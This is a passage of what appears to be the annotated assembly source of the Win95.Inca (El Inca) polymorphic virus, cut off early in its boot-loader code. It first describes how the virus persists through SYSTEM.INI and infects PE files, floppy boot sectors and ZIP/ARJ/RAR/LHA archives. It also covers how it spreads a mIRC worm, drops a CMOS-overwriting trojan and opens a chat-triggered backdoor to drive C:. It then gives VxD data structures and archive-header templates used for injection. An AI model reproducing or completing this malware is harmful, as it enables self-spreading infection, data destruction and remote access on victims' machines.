; with the elementary algorithm, a code of the 32bit VxD-driver,
; which is contained inside of the 16bit DOS-code, and writes it in
; this newly created FONO98.VXD file.
;
; Further virus opens a configuration Windows file SYSTEM.INI, searches
; in it for the section "[386Enh]" and just below this line
; writes a line "device=fono98.vxd".
;
; After described manipulations, or, if the line "device=fono98.vxd"
; is already is present in the SYSTEM.INI, or file FONO98.VXD
; was created earlier in the /WINDOWS/SYSTEM folder, or,
; if it wasn't possible to find the WINDOWS folder, virus finishes its
; work and returns management to DOS.
;
; After the system reboots, on the next start of Windows the virus
; VxD driver FONO98.VXD is loaded into memory by the system and
; run.
;
; As its first task, the virus driver deletes the system driver HSFLOP.PDR
; from the \WINDOWS\SYSTEM\IOSUBSYS folder (presumably so that floppy
; access goes through the Int 13h path the virus hooks, see below).
; in memory a code from its own FONO98.VXD and creates in memory
; three different polymorphic copies: for infection PE EXE-files,
; for infection of boot-sectors of floppies and for creation of
; 16bit DOS droppers in a format of COM-files.
; Futher, in a current session, and untill the next system reboot,
; virus will infect the specified objects only with these copies.
;
; Win95.Inca concerns to a class of the "slow polymorpics".
; Further virus "intercepts" IFSMgr FileSystemApiHook and Int 13h
; (disk operations), establishing on them its own events handlers.
;
; IFSMgr handler of the virus supervises opening files. On the
; opening files with extensions EXE and SCR, virus checks their
; internal format, and if the opening files are Portable Executable,
; virus infects them, by creating additional code section with a
; random name in the header of PE-file and writing in its area virus
; polymorphic code. On opening of archive files with the extensions
; LHA, LZH, PAK, ZIP, ARJ or RAR, the virus adds to the given
; archives its 16bit polymorphic code (worm) in a format of COM-file,
; also modifies header of the archive files in such a manner that
; the this virus-worm appears placed in the archive in a unpacked
; form (store format) also receives a random name, consisting from
; four letters, and with the extension COM or EXE (for example, AAAA.COM
; or ABCD.EXE). On opening of the MIRC32.EXE file (program for
; "chat" over the Internet) the virus writes or adds in the end
; of the configuration file MIRC.INI, line " [fileserver]" and
; "Warning = Off".
;
; The virus also creates the files SCRIPT.OLD, SCRIPT.INI, INCA.EXE and
; REVENGE.COM (the original wording is ambiguous about whether existing
; files are overwritten).
; In the file INCA.EXE, virus writes a code of the polymorphic 16bit
; virus-worm. In the file REVENGE.COM - 231 bytes of the trojan code,
; that rewrites the content of the CMOS-memory.
; [*Authors Note - It put a password in AMI/AWARD BIOS*]
;
; And in the file SCRIPT.INI virus writes text of the virus MIRC-worm.
;
; When mIRC32 starts with the SCRIPT.INI script loaded,
; the script runs the file INCA.EXE.
; tries to send files SCRIPT.INI (mIRC-worm) and INCA.EXE (virus
; dropper) to computers of all members of the "chat conversation" in
; the Internet.
; If the string "El_inca" appears in the chat, the SCRIPT.INI script
; launches the trojan program REVENGE.COM. If somebody "says the word"
; "ancev", the script grants that person access to drive C: -
; a remote backdoor that works even if the person is thousands of
; miles from the infected computer.
;
; And if the text "_29A_" appears during the "conversation",
; the program MIRC32.EXE exits.
;
; The virus handler for disk operations on Int 13h watches for
; reads of the boot sector of floppies in drive A:
; and, when it gets the opportunity, infects them by replacing the original
; boot loader with a polymorphic one and writing its own
; copy to the disk.
;
; On a booting from such infected floppy, virus loader will
; receive management, and will read to memory all sectors with the
; virus code, "will intercept" Int 1Ch (timer), and then Int 21h.
; The task of the Int 21h handler is simple: at the first
; opportunity it tries to create FONO98.VXD in the
; C:\WINDOWS\SYSTEM folder and to register
; it in the SYSTEM.INI configuration file (in the "[386Enh]" section).
; The task is exactly the same as the one performed by the
; C:\W95INCA.COM file dropper, whose algorithm was
; described at the beginning.
; The only difference is that the dropper C:\W95INCA.COM determines
; the location of the Windows system folder from the WINDIR variable,
; whereas the Int 21h handler hard-codes C:\WINDOWS\SYSTEM
; (so presumably a non-default Windows path is not reached by this route).
; After this attempt (successful or not) the virus
; "releases" Int 21h and neutralizes its own copy in memory.
;
; The virus contains text "El Inca virus".
;
; The size of the virus VxD-driver is 15327 bytes.
;
; So, all infected objects can be considered as virus-hosts or droppers,
; except created by the virus VxD-driver.
; This VxD-driver installs virus copy in memory, and hits all other
; objects. However you see that it does not infect
; "similar to itself" VxD-drivers. VxD-driver is only the carrier
; of an infection, but it is not an infected object.
;

 MINSIZEINFECT EQU 8*1024 ;8 KiB; by its name the minimum host size below which no infection is attempted (consumer is outside this chunk)

 BPB STRUC ;Overlay for the start of a floppy boot sector. Field sizes and order
           ;match the classic DOS BIOS Parameter Block, so the meanings below
           ;follow from position (the member names are abbreviations).
 bpb_jmp db 3 dup (?) ;3-byte jump to the boot code
 bpb_oem db 8 dup (?) ;OEM identifier
 bpb_b_s dw ? ;bytes per sector
 bpb_s_c db ? ;sectors per cluster
 bpb_r_s dw ? ;reserved sectors
 bpb_n_f db ? ;number of FATs
 bpb_r_e dw ? ;root directory entries
 bpb_t_s dw ? ;total sectors
 bpb_m_d db ? ;media descriptor
 bpb_s_f dw ? ;sectors per FAT
 bpb_s_t dw ? ;sectors per track
 bpb_n_h dw ? ;number of heads
 bpb_h_d dw ? ;hidden sectors
 bpb_sht db 20h dup (?) ;20h further bytes, not named individually here
 BPB ENDS

.386p
.XLIST
 Include Vmm.Inc
 Include Ifs.Inc
 Include Ifsmgr.Inc
.LIST

Declare_Virtual_Device FONO98, 1, 0, FONO98_Control, Undefined_Device_ID,,, ;VxD descriptor: name FONO98, version 1.0, control procedure FONO98_Control (not in this chunk), no assigned device ID; remaining macro arguments left empty

VxD_Locked_Code_Seg

 IncaName db 'INCA.EXE', 0 ;Name of the dropped worm file (see description above) - detection indicator
 NextHook dd 0 ;Presumably the previous handler in the IFS hook chain - confirm in the hook-install code (outside this chunk)
 FileHandle dd 0 ;Handle, size and attributes of the file currently being processed
 FileSize dd 0
 FileAttr dd 0
 Pad dd 0
 BufferOneHandle dd 0 ;Handles of two work buffers (allocation not in this chunk)
 BufferTwoHandle dd 0
 VxDCompressedBuffer dd 0 ;Compressed copy of this VxD and its size (the description says droppers carry a packed VxD image)
 VxDCompressedSize dd 0
 PolyBootSize dd 0 ;Per-session polymorphic copies: boot loader, DOS COM dropper and PE
 PolyBootBuffer dd 0 ;code - generated once per session according to the description
 PolyDOSFileBuffer dd 0
 PolyDOSFileSize dd 0
 PolyPESize dd 0
 PolyPEBuffer dd 0
 VMF_handle dd 0 ;Handle / size / base triple; what "VMF" denotes is not established by this chunk
 VMF_size dd 0
 VMF_base dd 0
 OurFile db 0 ;Byte flags; their exact meaning is not established by this chunk
 FloppyInUse db 0
 UpDown db 0
 Compressed db 0
 CrpTbl db 200h dup (0) ;200h-byte table (name suggests a crypt/poly table - unconfirmed)
 SectorBuffer Equ This Byte ;NOTE: no storage of its own - aliases the start of CrcTab below
 CrcTab db 2048 dup (0)
 FileName Equ This Byte ;NOTE: likewise aliases VMM32Path below
 VMM32Path db MAX_PATH dup (0)

 ZIPRHeaderId db 'PK' ;Template for a ZIP central-directory file header ('PK' 01 02)
 ZIPRSignature db 01, 02 ;describing the entry appended to ZIP archives
 ZIPRVerMade dw 10
 ZIPRVerNeed dw 0ah
 ZIPRFlags dw 0
 ZIPRMethod dw 0 ;method 0 = stored, matching the "store format" in the description
 ZIPRTimeDate dd 12345678h ;placeholder timestamp (presumably overwritten at runtime)
 ZIPRCRC32 dd 0
 ZIPRCompressed dd 0
 ZIPRUncompressed dd 0
 ZIPRSizeFilename dw ZIPRNameLenght
 ZIPRExtraField dw 0
 ZIPRCommentSize dw 0
 ZIPRDiskNumba dw 0
 ZIPRInternalAttr dw 01
 ZIPRExternalAttr dd 21h
 ZIPROffsetLHeaderR dd 0 ;offset of the matching local header; zero here, filled at runtime (presumably)
 ZIPRFilename db 'AAAA.COM' ;placeholder; the description says the name is randomized (4 letters, .COM/.EXE)
 ZIPRNameLenght Equ This Byte - offset32 ZIPRFilename
 ZIPRHeaderSize Equ This Byte - offset32 ZIPRHeaderId

 ZIPLHeaderId db 'PK' ;Template for the matching ZIP local file header ('PK' 03 04)
 ZIPLSignature dw 0403h ;little-endian word -> bytes 03 04
 ZIPLVersionNeed dw 0010
 ZIPLFlags dw 80h
 ZIPLMethod dw 0 ;stored
 ZIPLDateTime dd 12345678h ;placeholder timestamp
 ZIPLCRC32 dd 0
 ZIPLCompressed dd 0
 ZIPLUncompressed dd 0
 ZIPLSizeFilename dw ZIPLNameLenght
 ZIPLExtraField dw 0
 ZIPLFilename db 'AAAA.COM' ;placeholder; must stay consistent with ZIPRFilename above
 ZIPLNameLenght Equ This Byte - offset32 ZIPLFilename

 ZIPReadBuffer Equ This Byte ;Alias for the buffer below (no storage of its own)
 ZIPEHeaderId db 'PK' ;End-of-central-directory record as read from the target archive;
 ZIPSignature dw 0 ;signature word left zero here, so presumably filled by the read
 ZIPNoDisk dw 0
 ZIPNoStartDisk dw 0
 ZIPEntryDisk dw 0
 ZIPEntrysDir dw 0
 ZIPSizeDir dd 0
 ZIPOffsetDir dd 0
 ZIPCommentLenght dw 0
 ZIPEHeaderSize Equ This Byte - offset32 ZIPEHeaderId

 ARJHeaderId dw 0ea60h ;ARJ header magic (bytes 60 EA); template for the appended ARJ entry
 ARJHeaderSize dw offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize ;basic header size, computed from the layout below
 ARJ1HEaderSize db offset32 ARJFilename-offset32 ARJ1HeaderSize ;first-header size up to the file name
 ARJVersionDone db 6
 ARJVersionNeed db 1
 ARJHostOS db 0
 ARJFlags db 0
 ARJMethod db 0 ;0 = stored
 ARJType db 0
 ARJReserved db 0
 ARJDateTime dd 12345678h ;placeholder timestamp
 ARJCompressedSize dd 0
 ARJUncompressedSize dd 0
 ARJFileCRC dd 0
 ARJEntryname dw 0
 ARJAccessMode dw 21h
 ARJHostData dw 0
 ARJFilename db 'AAAA.COM',0 ;placeholder; randomized per description
 ARJComment db 0
 ARJHeaderCRC dd 0 ;filled at runtime (presumably)
 ARJExtHeader dw 0
 ARJEnd dw 0ea60h, 0000h ;magic followed by zero header size - end-of-archive marker

 RARHeaderCRC dw 0 ;Template for a RAR 2.x file header; CRC filled at runtime (presumably)
 RARHeaderType db 74h ;74h = file header block type
 RARFileFlags dw 08000h
 RARHeaderSize dw offset32 RARHeaderEnd - offset32 RARHeaderCRC ;computed from the layout below
 RARCompressedSize dd 0
 RARUncompressedSize dd 0
 RARHostOS db 0
 RARFileCRC dd 0
 RARDateTime dd 12345678h ;placeholder timestamp
 RARVersionNeed db 14h
 RARMethod db 30h ;30h ('0') = stored
 RARFileNameSize dw offset32 RARHeaderEnd - offset32 RARFileName
 RARFileAttribute dd 21h
 RARFileName db 'AAAA.COM' ;placeholder; randomized per description
 RARHeaderEnd Equ This Byte

 LHASig db LHAHeaderSize-2 ;Template for an LHA header; first byte = header size minus 2
 LHAHeaderCRC db 0 ;header checksum byte, filled at runtime (presumably)
 LHAMethod db '-lh0-' ;'-lh0-' = stored (no compression)
 LHACompressedSize dd 0
 LHAUncompressedSize dd 0
 LHADateTime dd 12345678h ;placeholder timestamp
 LHAFlags dw 120h
 LHANameLenght db offset32 LHASizeFilename - offset32 LHAFilename ;file name length, computed from the layout
 LHAFilename db 'AAAA.COM' ;placeholder; randomized per description
 LHASizeFilename Equ This Byte
 LHACRC16 dw 0
 LHAStuff db 'M' ;trailing bytes; 'M' is the MS-DOS OS id in LHA headers (header level not confirmed here)
 LHAStuff2 dw 0
 LHAHeaderSize Equ This Byte - offset32 LHASig

 MyVxDName db "FONO98.VXD",0 ;Dropped driver name (created under \WINDOWS\SYSTEM per description) - detection indicator
 SizeVxDName Equ This Byte - offset32 MyVxDName

 FloppyVxD db "IOSUBSYS/HSFLOP.PDR", 0 ;System floppy driver the VxD deletes; NOTE(review): the '/' is almost certainly a '\' lost in extraction (the header already says the listing is not compilable as is)
 SizeFloppyVxDName Equ This Byte - offset32 FloppyVxD

 BootLoaderSize Equ BootLoaderEnd-BootLoader
 BootLoader: ;This code is inserted in
 cli ;0/1/15 in 1.44 floppies
 xor ax, ax
 mov ss, ax
 mov sp, 7c00h 

 
